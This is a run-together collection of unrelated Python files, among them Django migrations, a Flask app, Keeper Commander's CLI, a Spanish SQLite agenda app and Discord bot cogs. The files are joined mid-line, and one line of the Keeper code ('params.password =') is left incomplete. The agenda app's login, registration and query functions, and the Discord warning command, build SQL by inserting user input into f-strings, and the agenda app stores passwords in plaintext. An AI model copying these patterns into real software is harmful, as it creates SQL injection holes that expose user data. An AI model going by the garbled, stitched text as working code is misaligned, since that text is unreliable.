__getitem__(self, index): if index == 0: return self.x elif index == 1: return self.y elif index == 2: return self.z else: raise IndexError def __add__(self, other): return Vector(self.x + other.x, self.y + other.y, self.z + other.z) def __iadd__(self, other): self.x += other.x self.y += other.y self.z += other.z return self def __sub__(self, other): return Vector(self.x - other.x, self.y - other.y, self.z - other.z) def __isub__(self, other): self.x -= other.x self.y -= other.y self.z -= other.z return self def __mul__(self, multiple): return Vector(self.x*multiple, self.y*multiple, self.z*multiple) def __imul__(self, multiple): self.x *= multiple self.y *= multiple self.z *= multiple return self def __truediv__(self, divisor): return Vector(self.x / divisor, self.y / divisor, self.z / divisor) def __itruediv__(self, divisor): self.x /= divisor self.y /= divisor self.z /= divisor return self def __ifloordiv__(self, divisor): self.x //= divisor self.y //= divisor self.z //= divisor return self def __floordiv__(self, divisor): return Vector(self.x // divisor, self.y // divisor, self.z // divisor) def __idiv__(self, divisor): self.x /= divisor self.y /= divisor self.z /= divisor return self def __eq__(self, other): return self.x == other.x and self.y == other.y and self.z == other.z def __ne__(self, other): return self.x != other.x or self.y != other.y or self.z != other.z def __str__(self): return "({0}, {1}, 
{2})".format(self.x, self.y, self.z) def __repr__(self): return "Vector(x={0},y={1},z={2})".format(self.x, self.y, self.z) def copy(self): """ Returns a deep copy of the current vector instance. """ return Vector(self.x, self.y, self.z) jaehyoungyoo/airbnb_cloneairbnb/rooms/migrations/0006_auto_20190601_2247.py # Generated by Django 2.1.8 on 2019-06-01 13:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rooms', '0005_auto_20190601_1710'), ] operations = [ migrations.RemoveField( model_name='room', name='map_address', ), migrations.AddField( model_name='room', name='lat', field=models.FloatField(blank=True, null=True), ), migrations.AddField( model_name='room', name='lng', field=models.FloatField(blank=True, null=True), ), ] 2020/13/part_1.py """ day 13 """ def read_input(file_path): with open(file_path, 'r') as file_handle: lines = file_handle.readlines() arrival = int(lines[0].strip()) busses = [] for bus in lines[1].strip().split(","): if bus != "x": busses.append(int(bus)) return (arrival, busses) def solve(arrival, busses): def find_first_bus(): timestamp = arrival while True: for bus in busses: if (timestamp % bus) == 0: return bus, timestamp timestamp += 1 bus, timestamp = find_first_bus() return bus * (timestamp - arrival) def main(): print(solve(*read_input("sample.txt"))) print(solve(*read_input("input.txt"))) if __name__ == "__main__": main()import bisect import os import json import flask # the app object app = flask.Flask(__name__, static_url_path='') # setup path = os.path.join(os.path.split(__file__)[0], 'data/all.json') with open(path, "rt") as fp: all_dict = json.load(fp) all_sorted = sorted(all_dict.keys()) # this route is not needed in production @app.route('/', methods=['GET']) def index(): return app.send_static_file("html/index.html") @app.route('/app/suggest', methods=['POST']) def suggest(): obj = flask.request.get_json() p_naked = obj['Naked'] pos = bisect.bisect_left(all_sorted, p_naked) raw_results = all_sorted[pos:pos+10] obj['Nakeds'] = raw_results return flask.jsonify(obj) @app.route('/app/naked', methods=['POST']) def naked(): jsonobject = flask.request.get_json() for obj in jsonobject: p_naked = obj['Naked'] if p_naked in all_dict: results = all_dict[p_naked] else: results = [] obj['Nikudim'] = results return flask.jsonify(jsonobject) if __name__ == '__main__': app.run(host='127.0.0.1', port=8080, debug=True) from io import BytesIO from typing import IO, Optional from wai.test.serialisation import RegressionSerialiser class BinaryFileSerialiser(RegressionSerialiser): @classmethod def binary(cls) -> bool: return True @classmethod def extension(cls) -> str: return "bin" @classmethod def serialise(cls, result: BytesIO, file: IO[bytes]): result.seek(0) file.write(result.read()) @classmethod def deserialise(cls, file: IO[bytes]) -> BytesIO: result = BytesIO() result.write(file.read()) return result @classmethod def compare(cls, result: BytesIO, reference: BytesIO) -> Optional[str]: result.seek(0) reference.seek(0) if result.read() != reference.read(): return "Binary files don't match" return None ishirav/cronorc # Generated by Django 2.2.9 on 2020-02-01 15:22 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0005_execution_notification'), ] operations = [ migrations.AddField( model_name='job', name='display_name', field=models.CharField(blank=True, max_length=100, null=True), ), ] esa-security-deverlopment/Commander0 # -*- coding: utf-8 -*- # _ __ # | |/ 
/___ ___ _ __ ___ _ _ ® # | ' # Copyright 2018 Keeper Security Inc. # Contact: # import re import sys import os import argparse import shlex import json import logging import base64 from . import __version__ from .params import KeeperParams from . import cli def get_params_from_config(config_filename): params = KeeperParams() params.config_filename = config_filename or 'config.json' try: with open(params.config_filename) as config_file: try: params.config = json.load(config_file) if 'user' in params.config: params.user = params.config['user'].lower() if 'server' in params.config: params.server = params.config['server'] if 'password' in params.config: params.password = params.config['password'] if 'timedelay' in params.config: params.timedelay = params.config['timedelay'] if 'mfa_token' in params.config: params.mfa_token = params.config['mfa_token'] if 'mfa_type' in params.config: params.mfa_type = params.config['mfa_type'] if 'commands' in params.config: if params.config['commands']: params.commands.extend(params.config['commands']) if 'plugins' in params.config: params.plugins = params.config['plugins'] if 'debug' in params.config: params.debug = params.config['debug'] if 'batch_mode' in params.config: params.batch_mode = params.config['batch_mode'] == True if 'device_id' in params.config: device_id = base64.urlsafe_b64decode(params.config['device_id'] + '==') params.rest_context.device_id = device_id except: print('Error: Unable to parse JSON file ' + params.config_filename) raise except IOError: if config_filename: print('Error: Unable to open config file ' + config_filename) pass if not params.server: params.server = 'https://keepersecurity.com/api/v2/' return params def usage(m): print(m) parser.print_help() cli.display_command_help(show_enterprise=True, show_shell=True) sys.exit(1) parser = argparse.ArgumentParser(prog='keeper', add_help=False) parser.add_argument('--server', '-ks', dest='server', action='store', help='Keeper Host address.') parser.add_argument('--user', '-ku', dest='user', action='store', help='Email address for the account.') parser.add_argument('--password', '-kp', dest='password', action='store', help='Master password for the account.') parser.add_argument('--version', dest='version', action='store_true', help='Display version') parser.add_argument('--config', dest='config', action='store', help='Config file to use') parser.add_argument('--debug', dest='debug', action='store_true', help='Turn on debug mode') parser.add_argument('--batch-mode', dest='batch_mode', action='store_true', help='Run commander in batch or basic UI mode.') parser.add_argument('command', nargs='?', type=str, action='store', help='Command') parser.add_argument('options', nargs='*', action='store', help='Options') parser.error = usage def main(): logging.basicConfig(level=logging.INFO, format='%(message)s') sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) opts, flags = parser.parse_known_args(sys.argv[1:]) params = get_params_from_config(opts.config) if opts.debug: params.debug = opts.debug if opts.batch_mode: params.batch_mode = True if opts.server: params.server = 'https://{0}/api/v2/'.format(opts.server) if opts.user: params.user = opts.user if opts.password: params.password = opts.password else: pwd = os.getenv('KEEPER_PASSWORD') if pwd: params.password = if opts.version: print('Keeper Commander, version {0}'.format(__version__)) return if flags and len(flags) > 0: if flags[0] == '-h': flags.clear() opts.command = '?' 
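# Mapping a bare '-h' flag to the '?' pseudo-command makes the branch below call usage(''), which
# prints the argparse help together with the Commander command list.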
if (opts.command or '') in {'?', ''}: if opts.command == '?' or not params.commands: usage('') if params.timedelay >= 1 and params.commands: cli.runcommands(params) else: if opts.command != 'shell': if opts.command: flags = ' '.join([shlex.quote(x) for x in flags]) if flags is not None else '' options = ' '.join([shlex.quote(x) for x in opts.options]) if opts.options is not None else '' command = ' '.join([opts.command, flags, options]) params.commands.append(command) params.commands.append('q') cli.loop(params) if __name__ == '__main__': main() ''' _____ _ | ___| _ _ __ ___(_) ___ _ __ ___ ___ | |_ | | | | '_ \ / __| |/ _ \| '_ \ / _ \/ __| | _|| |_| | | | | (__| | (_) | | | | __/\__ \. |_| \__,_|_| |_|\___|_|\___/|_| |_|\___||___/ ''' import sqlite3 import calendario as cal import admin as adm import webbrowser import pandas as pd import os from tkinter import * from t3 import calendario def exportar_a_fichero(Tabla): ''' Exporta una tabla a fichero ''' database = "agenda.db" conn = create_connection(database) consulta = pd.read_sql_query(f"SELECT * FROM '{Tabla}'", conn) df = pd.DataFrame(consulta) path = r"{}\{}.csv".format(os.getcwd(), Tabla) df.to_csv (path, index = False) def abrir_google_maps(url): ''' Abre la url deseada ''' webbrowser.open_new(url) def create_connection(db_file): ''' Recibe un fichero de base de datos y devuelve una conexion sqlite3 ''' conn = None try: conn = sqlite3.connect(db_file) return conn except sqlite3.Error as e: print(e) return conn def create_table(conn, create_table_sql): ''' Recibe una consulta SQL para crear una tabla y la ejecuta sobre la base de datos ''' try: c = conn.cursor() c.execute(create_table_sql) except sqlite3.OperationalError as e: print(e) def crear_tabla_usuarios(database): ''' Crea la tabla Usuarios ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Usuarios ( username text PRIMARY KEY, password text ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! cannot create citas table") return def crear_tabla_citas(database): ''' Crea la tabla Citas ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Citas ( id_cita integer PRIMARY KEY AUTOINCREMENT, username integer, nombre text, descripcion text, lugar text, fecha text, hora text, importancia integer, FOREIGN KEY(username) REFERENCES Usuarios(username) ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! cannot create citas table") return def crear_tabla_ajustes(database): ''' Crea la tabla Ajustes ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Ajustes ( username text PRIMARY KEY, font text DEFAULT 'Times', fontsize integer DEFAULT 14, background_color text DEFAULT '#0B5A81' ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! 
cannot create citas table") return def insert_row_citas(id_user,nombre, descripcion, lugar,fecha,hora, importancia): ''' Inserta una cita en la tabla Citas ''' try: database = "agenda.db" conn = create_connection(database) c = conn.cursor() introducir_cita = f"""INSERT INTO Citas (username,nombre,descripcion,lugar,fecha,hora,importancia) VALUES ('{id_user}','{nombre}','{descripcion}','{lugar}', '{fecha}','{hora}','{importancia}');""" print('Insertando ', introducir_cita) c.execute(introducir_cita) conn.commit() conn.close() except sqlite3.OperationalError as msg: print("Error en el registro de citas ") print(msg) def get_cita(username,fecha): ''' Obtiene la cita de un usuario en una fecha determinada ''' try: database = "agenda.db" conn = create_connection(database) c = conn.cursor() buscar_factura= f"SELECT * from Citas WHERE fecha= '{fecha}' and username = '{username}' ;" c.execute(buscar_factura) row = c.fetchone() if row: # Una fila devuelta print('Cita encontrada - Get Citas OK') else: print('Cita NO encontrado - Get Citas ERROR') return row except sqlite3.OperationalError as msg: print("Error al encontrar la de facturas") def drop_table(tabla): ''' Recibe una consulta SQL para borrar una tabla y la ejecuta sobre la base de datos ''' try: conn = create_connection('agenda.db') c = conn.cursor() borrar_tabla = f"DROP TABLE {tabla} ;" c.execute(borrar_tabla) except sqlite3.OperationalError as msg: print(msg) print("Error al encontrar la de citas") def borrar_cita(): ''' Borra una cita de la BBDD ''' try: conn = create_connection('agenda.db') c = conn.cursor() query = f"DELETE from Citas where Fecha" c.execute(query) except sqlite3.OperationalError as msg: print(msg) print("Error al encontrar la de citas") def get_citas_importancia(): ''' Devuelve un listado de las citas de un usuario con su importancia ''' database = "agenda.db" conn = create_connection(database) c = conn.cursor() buscar_factura= f"SELECT fecha, importancia from Citas;" c.execute(buscar_factura) res = c.fetchall() return res def drop_table_citas(): ''' Recibe una consulta SQL para crear una tabla y la ejecuta sobre la base de datos ''' try: conn = create_connection('agenda.db') c = conn.cursor() borrar_tabla = f"DROP TABLE Citas ;" c.execute(borrar_tabla) except sqlite3.OperationalError as msg: print(msg) def login_attempt(username,password,padre): ''' Realizamos un intento de login con los datos proporcionados en la BBDD ''' if len(password) != 0: print('Login') # Comprobar usuario en BBDD conn = create_connection('agenda.db') buscar_usuario = f"SELECT username from Usuarios WHERE username='{username}' and password='{password}';" c = conn.cursor() c.execute(buscar_usuario) row = c.fetchone() if row: # Una fila devuelta print('Usuario encontrado - Login OK') print(row) padre.destroy() # Cambiar por el calendario if row[0] == "admin": adm.ventana_admin() else: calendario(username) return else: print('Usuario NO encontrado - Login ERROR') print('Usuario o contraseña INCORRECTA') else: print('Password vacia') def register_attempt(username,passwd,repasswd,padre): ''' Intentamos hacer un registro en la base de datos Si Register_OK --> True [] --> False ''' if passwd == repasswd and len(passwd) > 0: conn = create_connection('agenda.db') buscar_usuario = f"SELECT username from Usuarios WHERE username='{username}';" c = conn.cursor() c.execute(buscar_usuario) row = c.fetchone() if not row: # Ninguna fila devuelta registrar_usuario = f"INSERT INTO Usuarios (username,password) VALUES('{username}','{passwd}');" try: 
c.execute(registrar_usuario) default_settings = f"INSERT INTO Ajustes (username) VALUES('{username}');" c.execute(default_settings) conn.commit() conn.close() print("Registro usuario OK") padre.destroy() except sqlite3.OperationalError as msg: print("Registro usuario ERROR") print(msg) else: print('El usuario ya existe en la BBDD ') print(row) else: print("Las password no coinciden o son NULL") def get_user_settings(username): ''' Obtiene los settings del usuario ''' conn = create_connection('agenda.db') listar = f"SELECT * from Ajustes WHERE username = '{username}';" c = conn.cursor() c.execute(listar) user_settings = c.fetchone() return user_settings def listado_bbdd(): ''' ''' conn = create_connection('agenda.db') listar = f'SELECT username from Usuarios;' c = conn.cursor() c.execute(listar) rows = c.fetchall() for row in rows: print(row) def listado_citas_usuario(username): ''' Devuelve las citas del usuario @param(username) ''' conn = create_connection('agenda.db') listar = f"SELECT fecha, importancia from Citas WHERE username LIKE '{username}';" c = conn.cursor() c.execute(listar) rows = c.fetchall() citas_importancia = [] # result = [dict(row) for row in c.fetchall()] for row in rows: citas_importancia.append(row) return citas_importancia def create_tables_agenda(db_file): ''' Crea las tablas necesarias para ejecutar la agenda ''' crear_tabla_usuarios(db_file) print('Tabla Usuarios creada con exito!') crear_tabla_citas(db_file) print('Tabla Citas creada con exito!') crear_tabla_ajustes(db_file) print('Tabla Ajustes creada con exito!') guimaraesalves/material-python0 n1 = int(input()) n2 = int(input()) s = n1 + n2 print ('SOMA =', s) bot/VoiceUser.py0 import os import discord import asyncio from discord import ChannelType class VoiceUser: def __init__(self, client): self.client = client self.voiceClient = None self.player = None async def joinCommandAuthorVoiceChannel(self, author): for channel in self.client.get_all_channels(): if channel.type == ChannelType.voice and author in channel.voice_members: self.voiceClient = await self.client.join_voice_channel(channel) return True # if author not in a voice channel for channel in self.client.get_all_channels(): if channel.type == ChannelType.voice and len(channel.voice_members): self.voiceClient = await self.client.join_voice_channel(channel) return True return Falsefrom simply_ts_domain import simplified_ts_domain def main(): file_path = str(input('Output file path: ')) file_name = str(input('Generated File Name: ')) study_type = str(input('Study Type [clinical, non-clinical]: ')) study_id = str(input('Study ID: ')) start_date = str(input('Study Start Date [YYYY-MM-DD]: ')) study_except_code = str(input('Study Start Date Exception Code: ')) if len(file_path) > 1 and file_path[len(file_path) - 1] != '/': file_path = file_path + '/' st_domain = simplified_ts_domain(file_path, file_name, study_type, study_id, start_date, study_except_code) st_domain.generate() if __name__ == "__main__": main()import argparse import logging import multiprocessing from concurrent.futures import ProcessPoolExecutor import editdistance from dataset import * from engine import * logging.basicConfig(format='%(asctime)s %(message)s') logging.getLogger().setLevel(logging.INFO) def _word_error_info(ref, decoded): """ Computes the number of errors for a given decoded transcription and the number of words in reference transcription. :param ref: Reference (true) transcription. :param decoded: Decoded (by speech-to-text engine) transcription. 
:return: Tuple of number of word errors and number of words in reference transcription. """ ref_words = ref.strip('\n ').lower().split() decoded_words = decoded.strip('\n ').lower().split() word_error_count = editdistance.eval(ref_words, decoded_words) return word_error_count, len(ref_words) def _process_chunk(engine_type, engine_params, data_chunk): """ Transcribes a chuck of data with a given engine and returns number of word errors and total number of words processed (number of words in reference transcriptions). :param engine_type: Type of speech-to-text engine. :param engine_params: Engine parameters. :param data_chunk: An array of tuples of path to a WAV file and its corresponding transcription. :return: Tuple of total number of word errors and total number of words processed. """ engine = ASREngine.create(engine_type, **engine_params) sum_word_error_count = 0 sum_word_count = 0 for path, ref_transcript in data_chunk: decoded = engine.transcribe(path) error_count, count = _word_error_info(ref_transcript, decoded) sum_word_error_count += error_count sum_word_count += count return sum_word_error_count, sum_word_count def _run(): """ Runs the benchmark. Processes a corpus of speech data with a set of speech-to-text engines and computes their average word error rate. """ engines_params = dict([(x, dict()) for x in ASREngines]) engines_params[ASREngines.MOZILLA_DEEP_SPEECH].update( model_path=os.path.expanduser(args.deep_speech_model_path), alphabet_path=os.path.expanduser(args.deep_speech_alphabet_path), language_model_path=os.path.expanduser(args.deep_speech_language_model_path), trie_path=os.path.expanduser(args.deep_speech_trie_path)) dataset = Dataset.create(args.dataset_type, os.path.expanduser(args.dataset_root)) logging.info('loaded %s with %f seconds of data' % (str(dataset), dataset.size_seconds())) # NOTE: Depending on how much RAM you have you might need to reduce this when benchmarking DeepSpeech as it consumes # lots of RAM (specially when decoding with language model is enabled). 
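# For example (an illustrative alternative, not taken from the original script):
#   num_workers = max(1, multiprocessing.cpu_count() // 2)
# would halve the number of worker processes and correspondingly reduce peak memory usage.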
num_workers = multiprocessing.cpu_count() - 1 chunk_size = dataset.size() // num_workers for engine_type in ASREngines: logging.info('evaluating %s' % engine_type.value) # futures = [] # with ProcessPoolExecutor(num_workers) as pool: # for i in range(num_workers): # data_chunk = [dataset.get(j) for j in range(i * chunk_size, (i + 1) * chunk_size)] # future = pool.submit( # _process_chunk, # engine_type, # engines_params[engine_type], # data_chunk) # futures.append(future) # # word_error_info = [x.result() for x in futures] # word_error_count = sum([x[0] for x in word_error_info]) # word_count = sum([x[1] for x in word_error_info]) results = [] data_chunk = dataset.all_data() #[dataset.get(j) for j in range(i * chunk_size, (i + 1) * chunk_size)] results += [_process_chunk(engine_type, engines_params[engine_type], data_chunk)] word_error_count = sum([x[0] for x in results]) word_count = sum([x[1] for x in results]) logging.info('WER = %f' % (float(word_error_count) / word_count)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--dataset_type', type=str, required=True) parser.add_argument('--dataset_root', type=str, required=True) parser.add_argument('--deep_speech_model_path', type=str, required=True) parser.add_argument('--deep_speech_alphabet_path', type=str, required=True) parser.add_argument('--deep_speech_language_model_path', type=str, required=True) parser.add_argument('--deep_speech_trie_path', type=str, required=True) args = parser.parse_args() _run() output/models/nist_data/atomic/id/schema_instance/nistschema_sv_iv_atomic_id_white_space_1_xsd/__init__.py from output.models.nist_data.atomic.id.schema_instance.nistschema_sv_iv_atomic_id_white_space_1_xsd.nistschema_sv_iv_atomic_id_white_space_1 import ( NistschemaSvIvAtomicIdWhiteSpace1, Out, ) __all__ = [ "NistschemaSvIvAtomicIdWhiteSpace1", "Out", ] import webbrowser import requests import click import datetime import dateutil.parser # import webbrowser BASE_URL = 'https://www.scorebat.com/video-api/v1/' response = requests.get(url=f'{BASE_URL}') @click.group() def cli(): """A CLI App to stay up-to-date to with football.""" @click.option('-t', '--match', help='Match title, ex: matches -t "PSG - Bayern Munich"') @cli.command() def matches(match: str): """Retrieves latest football matches, navigates to match URL if match title is passed in.""" days = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"] no_items = [] if response.status_code == 200: if match: for index, item in enumerate(response.json()): if match == item['title']: match_url = response.json()[index]['url'] webbrowser.open(match_url) else: print("{:<44} {:32} {:<1}".format('MATCH', 'DATE', 'COMPETITION')) print('--------------------------------------------------------------------------------------------------------------------') for index, item in enumerate(response.json()): no_items.append(index) reverse_no_items = sorted(no_items, key=int, reverse=True) for item in reverse_no_items: match_title = response.json()[item]['title'] competition = response.json()[item]['competition']['name'] formatted_date = dateutil.parser.parse(response.json()[item]['date']) date_obj = datetime.datetime.strptime(f'{formatted_date.hour}:{formatted_date.minute}', "%H:%M") int_day = datetime.date(year=formatted_date.year, month=formatted_date.month, day=formatted_date.day).weekday() date_string = f'{days[int_day]} {formatted_date.month}/{formatted_date.day}, {date_obj.strftime("%I:%M %p")}' print("{:<44} {:<32} 
{:<1}".format(match_title, date_string, competition)) print('--------------------------------------------------------------------------------------------------------------------') else: print(f'Could not get the APIs: {response.text}') if __name__ == '__main__': cli(prog_name='Sweaty Goals')tidy_puj.py #!/usr/bin/env python3 import sys import re for line in sys.stdin: line = re.sub(r'\^', 'ⁿ', line.rstrip()) line = re.sub(r'\|', '\u030d', line.rstrip()) line = re.sub(r'w', 'ṳ', line) line = re.sub(r'ẃ', 'ṳ́', line) line = re.sub(r'ẁ', 'ṳ̀', line) line = re.sub(r'w̄', 'ṳ̄', line) line = re.sub(r'w̃', 'ṳ̃', line) print(line) albertozurli/mammoth # Copyright 2022-present, , , , , . # All rights reserved. # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. import numpy # needed (don't change it) import importlib import os import sys import socket mammoth_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(mammoth_path) sys.path.append(mammoth_path + '/datasets') sys.path.append(mammoth_path + '/backbone') sys.path.append(mammoth_path + '/models') from datasets import NAMES as DATASET_NAMES from models import get_all_models from argparse import ArgumentParser from utils.args import add_management_args from datasets import ContinualDataset from datasets import get_dataset from models import get_model from utils.training import train from utils.best_args import best_args from utils.conf import set_random_seed import setproctitle import torch import uuid import datetime from utils.testing import load_model,eval100 def lecun_fix(): # Yann moved his website to CloudFlare. You need this now from six.moves import urllib opener = urllib.request.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib.request.install_opener(opener) def parse_args(): parser = ArgumentParser(description='mammoth', allow_abbrev=False) parser.add_argument('--model', type=str, required=True, help='Model name.', choices=get_all_models()) parser.add_argument('--load_best_args', action='store_true', help='Loads the best arguments for each method, ' 'dataset and memory buffer.') torch.set_num_threads(4) add_management_args(parser) args = parser.parse_known_args()[0] mod = importlib.import_module('models.' 
+ args.model) if args.load_best_args: parser.add_argument('--dataset', type=str, required=True, choices=DATASET_NAMES, help='Which dataset to perform experiments on.') if hasattr(mod, 'Buffer'): parser.add_argument('--buffer_size', type=int, required=True, help='The size of the memory buffer.') args = parser.parse_args() if args.model == 'joint': best = best_args[args.dataset]['sgd'] else: best = best_args[args.dataset][args.model] if hasattr(mod, 'Buffer'): best = best[args.buffer_size] else: best = best[-1] get_parser = getattr(mod, 'get_parser') parser = get_parser() to_parse = sys.argv[1:] + ['--' + k + '=' + str(v) for k, v in best.items()] to_parse.remove('--load_best_args') args = parser.parse_args(to_parse) if args.model == 'joint' and args.dataset == 'mnist-360': args.model = 'joint_gcl' else: get_parser = getattr(mod, 'get_parser') parser = get_parser() args = parser.parse_args() if args.seed is not None: set_random_seed(args.seed) return args def main(args=None): lecun_fix() if args is None: args = parse_args() # Add uuid, timestamp and hostname for logging args.conf_jobnum = str(uuid.uuid4()) args.conf_timestamp = str(datetime.datetime.now()) args.conf_host = socket.gethostname() dataset = get_dataset(args) backbone = dataset.get_backbone(args.subclass) loss = dataset.get_loss() model = get_model(args, backbone, loss, dataset.get_transform()) if isinstance(dataset, ContinualDataset): train(model, dataset, args) # model_path = f"data/saved_model/{args.dataset[4:]}/model.pth.tar" # model = load_model(model,args) # eval100(model,args) if __name__ == '__main__': main() 0 # tests.test_file_rumi # Test file-based translation monitoring # # Author: # Created: Dec.6 2021 """ Test file-based translation monitoring """ ########################################################################## # Imports ########################################################################## cogs/mod.py import discord from discord.ext import commands import time, json, os from datetime import datetime from discord.utils import utcnow from datetime import timedelta class Moderation(commands.Cog): def __init__(self, bot): self.bot = bot f = open("settings.json") self.settings = json.load(f) f.close() @commands.command() @commands.has_permissions(kick_members=True) async def kick(self, ctx, user: discord.Member, *, reason=None): await user.kick(reason=reason) try: await user.send( f"😢 | You have been kicked from {ctx.guild.name} for reason {reason}" ) except: pass ch = self.bot.get_channel(int(os.environ["STAFF_CHAT"])) await ch.send(f"{user} has been kicked with reason {reason}") @commands.command() @commands.has_permissions(moderate_members=True) async def mute(self, ctx, user: discord.Member, *, args): reason = "Muted by " + ctx.author.name data = args.split(" ") print(args) minutes = 0 seconds = 0 hours = 0 days = 0 print(data) for a in data: if a.endswith("m"): minutes = int(a[:-1]) if a.endswith("s"): seconds = int(a[:-1]) if a.endswith("d"): days = int(a[:-1]) if a.endswith("h"): hours = int(a[:-1]) timeout_until = utcnow() + timedelta( minutes=minutes, seconds=seconds, days=days, hours=hours ) await user.edit(timeout_until=timeout_until) await user.send( f"U have been muted for {days} days {hours} hours {minutes} minutes {seconds} seconds" ) await ctx.send(f"{user.mention} muted!") @commands.command() @commands.has_permissions(moderate_members=True) async def unmute(self, ctx, user: discord.Member): await user.edit(timeout_until=None) await ctx.send(f"{user} unmuted.") @commands.command() 
@commands.has_permissions(ban_members=True) async def ban(self, ctx, user: discord.Member, *, reason=None): await user.ban(reason=reason) try: await user.send( f"😢 | You have been banned from {ctx.guild.name} for reason {reason}" ) except: pass ch = self.bot.get_channel(int(os.environ["STAFF_CHAT"])) await ch.send(f"{user} has been banned with reason {reason}") @commands.command() @commands.has_permissions(kick_members=True) async def warn(self, ctx, user: discord.User, *reason): cur = await self.bot.connection.cursor() print(reason) await cur.execute( f"INSERT into warns (user, reason, moderator) VALUES ('{user.id}', '{' '.join(list(reason))}', '{ctx.author.id}')" ) await ctx.send("I warned " + str(user)) @commands.command() async def warnings(self, ctx, user: discord.User): cur = await self.bot.connection.cursor() await cur.execute(f"SELECT * from warns WHERE user = '{user.id}'") r = await cur.fetchall() warns = "" for a in r: warns += ( f"Warned by {self.bot.get_user(int(a[2])).mention}. Reason: {a[1]}\n" ) emb = discord.Embed( title=f"{user}'s infractions", description=warns, color=discord.Color.green(), ) await ctx.send(embed=emb) @commands.command() async def purge(self, ctx, limit: int = 2): await ctx.channel.purge(limit=limit + 1) time.sleep(1) await ctx.send(f"Deleted {limit} messages", delete_after=2) async def setup(bot): await bot.add_cog(Moderation(bot)) 0 import discord from discord.ext import commands from alttprbot.database import srlnick from alttprbot.exceptions import SahasrahBotException from alttprbot.tournament import main, secondary from alttprbot.util import speedgaming from config import Config as c from ..util import checks # this module was only intended for the Main Tournament 2019 # we will probably expand this later to support other tournaments in the future class Tournament(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): if ctx.guild is None: return False if ctx.guild.id in c.Tournament: return True else: return False @commands.command() @commands.has_any_role('Admin', 'Admins', 'Bot Admin') async def ccloadreg(self, ctx): if c.Tournament[ctx.guild.id]['tournament'] == 'secondary': await secondary.loadnicks(ctx) else: raise SahasrahBotException( 'This command only works for the Challenge Cup.') @commands.command( help="Generate a tournament race.", aliases=['restreamrace', 'tournyrace', 'tounyrace'] ) @checks.has_any_channel('testing', 'console', 'lobby', 'restreamers', 'sg-races', 'bot-console', 'bot-testing', 'bot-commands') async def tourneyrace(self, ctx, episode_number): logging_channel = discord.utils.get( ctx.guild.text_channels, id=c.Tournament[ctx.guild.id]['logging_channel']) if c.Tournament[ctx.guild.id]['tournament'] == 'main': try: seed, game_number, players = await main.generate_game(episode_number, ctx.guild.id) except main.SettingsSubmissionNotFoundException: await dm_all_players_sg(ctx, episode_number, f"Settings submission not found at . Please submit settings at for episode `{episode_number}`! Once complete, re-run `$tourneyrace` command or contact your setup helper to have command re-ran.") raise except main.InvalidSettingsException: await dm_all_players_sg(ctx, episode_number, f"Settings submitted for episode `{episode_number}` are invalid! 
Please contact a tournament administrator for assistance.") raise elif c.Tournament[ctx.guild.id]['tournament'] == 'secondary': seed, game_number, players = await secondary.generate_game(episode_number, ctx.guild.id) else: raise SahasrahBotException( 'This should not have happened. Ping Synack.') embed = await seed.embed( name=f"{players[0]['displayName']} vs. {players[1]['displayName']} - {game_number} - {episode_number}", emojis=self.bot.emojis ) tournament_embed = await seed.tournament_embed( name=f"{players[0]['displayName']} vs. {players[1]['displayName']} - {game_number} - {episode_number}", notes="The permalink for this seed was sent via direct message to each runner.", emojis=self.bot.emojis ) if c.Tournament[ctx.guild.id]['tournament'] == 'main' and 'commentary_channel' in c.Tournament[ctx.guild.id]: episode = await speedgaming.get_episode(int(episode_number)) broadcast_channels = [] for channel in episode['channels']: if not channel['name'] == "No Stream": broadcast_channels.append(channel['name']) if len(broadcast_channels) > 0: commentary_channel = discord.utils.get( ctx.guild.text_channels, id=c.Tournament[ctx.guild.id]['commentary_channel']) tournament_embed.insert_field_at( 0, name="Broadcast Channels", value=f"*{', '.join(broadcast_channels)}*", inline=False) embed.insert_field_at( 0, name="Broadcast Channels", value=f"*{', '.join(broadcast_channels)}*", inline=False) await commentary_channel.send(embed=tournament_embed) await logging_channel.send(embed=embed) await ctx.send(embed=tournament_embed) for player in players: try: if not player.get('discordId', '') == '': member = ctx.guild.get_member(int(player['discordId'])) else: member = await commands.MemberConverter().convert(ctx, player['discordTag']) await member.send(embed=embed) except discord.HTTPException: await logging_channel.send(f"@here Unable to send DM to {player['displayName']}") await ctx.send(f"Unable to send DM to {player['displayName']}") @commands.command() @commands.has_any_role('Admin', 'Admins', 'Bot Admin') async def loadroles(self, ctx, role: discord.Role, names): namelist = names.splitlines() for name in namelist: discord_users = await srlnick.get_discord_id(name) if discord_users is False: continue else: for discord_user in discord_users: member = ctx.guild.get_member( discord_user['discord_user_id']) if member is not None: await member.add_roles(role) async def dm_all_players_sg(ctx, episode_number, msg): episode = await speedgaming.get_episode(int(episode_number)) for player in episode['match1']['players']: try: if not player.get('discordId', '') == '': member = ctx.guild.get_member(int(player['discordId'])) else: member = await commands.MemberConverter().convert(ctx, player['discordTag']) await member.send(msg) except discord.HTTPException: pass def setup(bot): bot.add_cog(Tournament(bot)) guillaume-chevalier/ReuBERTsrc/domain/pipeline_steps/question_response_evaluator/yesno_question_response_evaluator.py import copy class YESNOQuestionProcessor(): def __init__(self): super().__init__() def extract_best_answer(self, question, bert_answers): return self._extract_from_uncertain_answers(bert_answers) def _extract_from_uncertain_answers(self, bert_answers): best_answer = [0, ''] for answer in bert_answers: if answer[0] > best_answer[0] and answer[1] != '': best_answer = copy.deepcopy(answer) return best_answer[1] russab0/distractor_generationsrc/utility/dataset.py0 import os import pickle from random import choice import nlp2 import numpy import numpy as np import torch from torch.utils import data 
